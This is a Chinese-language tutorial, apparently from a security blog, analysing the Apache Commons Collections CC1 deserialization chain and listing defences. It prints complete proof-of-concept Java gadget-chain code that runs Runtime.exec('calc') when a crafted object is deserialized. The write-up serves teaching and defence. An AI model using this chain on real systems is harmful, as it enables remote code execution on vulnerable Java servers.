Apache Commons Collections反序列化漏洞(CC1链)分析<\/h1>

前置知识<\/h2>

1. Java反序列化机制<\/h3>

构造方法不执行<\/strong>：反序列化通过ObjectInputStream<\/code>读取字节流重建对象，不会调用类的任何构造方法<\/li>
readObject<\/code>方法调用<\/strong>：如果类实现了Serializable<\/code>接口并自定义了readObject<\/code>方法，反序列化时会调用该方法<\/li>

类加载要求<\/strong>：服务器必须能够找到并加载反序列化所需的类定义，否则会抛出ClassNotFoundException<\/code><\/li> <\/ul> 2. 反序列化实现RCE的条件<\/h3> 存在可以接受任意对象进行反序列化的入口点<\/li> 能够执行任意对象的readObject<\/code>方法<\/li> readObject<\/code>方法中可写入自定义逻辑<\/li> <\/ul> CC1链分析<\/h2> 1. 核心组件<\/h3> Transformer接口<\/h4> package<\/span> org.apache.commons.collections;<\/span> <\/span><\/span>public<\/span> interface<\/span> Transformer<\/span> {<\/span> <\/span><\/span> Object transform<\/span>(<\/span>Object var1);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>InvokerTransformer实现<\/h4> 关键代码：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span> <\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>NoSuchMethodException ex)<\/span> {<\/span> <\/span><\/span> \/\/ 异常处理 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>攻击示例：<\/p> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> .<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span> <\/span><\/span><\/code><\/pre>TransformedMap类<\/h4> 关键方法：<\/p> protected<\/span> Object checkSetValue<\/span>(<\/span>Object value)<\/span> {<\/span> <\/span><\/span> return<\/span> valueTransformer.<\/span>transform<\/span>(<\/span>value);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>使用方式：<\/p> Map<<\/span>Object,<\/span> Object><\/span> decorate =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> transformer);<\/span> <\/span><\/span><\/code><\/pre>AnnotationInvocationHandler类<\/h4> 关键点：<\/p> 包含readObject<\/code>方法<\/li> 在反序列化过程中会调用setValue<\/code>方法<\/li> 不是public类，需要通过反射实例化<\/li> <\/ul> 2. 完整攻击链构建<\/h3> 初始攻击尝试<\/h4> Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span>InvokerTransformer exec =<\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>});<\/span> <\/span><\/span> <\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>"a"<\/span>,<\/span> "b"<\/span>);<\/span> <\/span><\/span>Map<<\/span>Object,<\/span> Object><\/span> decorate =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> exec);<\/span> <\/span><\/span> <\/span><\/span>for<\/span>(<\/span>Map.<\/span>Entry<\/span> entry:<\/span> decorate.<\/span>entrySet<\/span>()){<\/span> <\/span><\/span> entry.<\/span>setValue<\/span>(<\/span>runtime);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>遇到的问题及解决方案<\/h4> Runtime未序列化问题<\/strong>：<\/p> 使用反射获取Runtime实例<\/li> 通过Class类(可序列化)间接调用<\/li> <\/ul> <\/li> AnnotationInvocationHandler检查问题<\/strong>：<\/p> 需要使用包含"value"成员的注解类(如Target.class)<\/li> 确保map中包含"value"键<\/li> <\/ul> <\/li> 值被覆盖问题<\/strong>：<\/p> 引入ConstantTransformer<\/code>固定返回值<\/li> <\/ul> <\/li> <\/ol> 最终攻击链<\/h4> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span> <\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "b"<\/span>);<\/span> <\/span><\/span>Map<<\/span>Object,<\/span> Object><\/span> decorate =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span> <\/span><\/span> <\/span><\/span>Class<?><\/span> c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span>Constructor<?><\/span> constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object o =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> decorate);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 序列化和反序列化触发漏洞 <\/span><\/span><\/span><\/span>serializable(<\/span>"payload.ser"<\/span>,<\/span> o);<\/span> <\/span><\/span>unserializable(<\/span>"payload.ser"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>3. 攻击链执行流程<\/h3> 反序列化触发AnnotationInvocationHandler.readObject<\/code><\/li> readObject<\/code>调用setValue<\/code>方法<\/li> setValue<\/code>调用TransformedMap.checkSetValue<\/code><\/li> checkSetValue<\/code>调用valueTransformer.transform<\/code><\/li> ChainedTransformer<\/code>依次执行：返回Runtime.class<\/code><\/li> 获取getRuntime<\/code>方法<\/li> 调用getRuntime<\/code>获取Runtime实例<\/li> 执行exec("calc")<\/code><\/li> <\/ul> <\/li> <\/ol> 防御措施<\/h2> 升级Apache Commons Collections到安全版本<\/li> 使用Java安全管理器限制反序列化<\/li> 对反序列化数据进行严格校验<\/li> 使用白名单控制可反序列化的类<\/li> <\/ol> 总结<\/h2> CC1链利用Apache Commons Collections中的Transformer接口和TransformedMap类，通过精心构造的链式调用，在反序列化过程中实现任意代码执行。关键在于：<\/p> 利用InvokerTransformer<\/code>实现反射调用<\/li> 通过TransformedMap<\/code>将恶意Transformer注入<\/li> 借助AnnotationInvocationHandler<\/code>的readObject<\/code>方法触发整个调用链<\/li> 使用ConstantTransformer<\/code>和ChainedTransformer<\/code>解决执行过程中的各种限制<\/li> <\/ol> 理解这条攻击链有助于更好地防御Java反序列化漏洞，提高应用安全性。<\/p>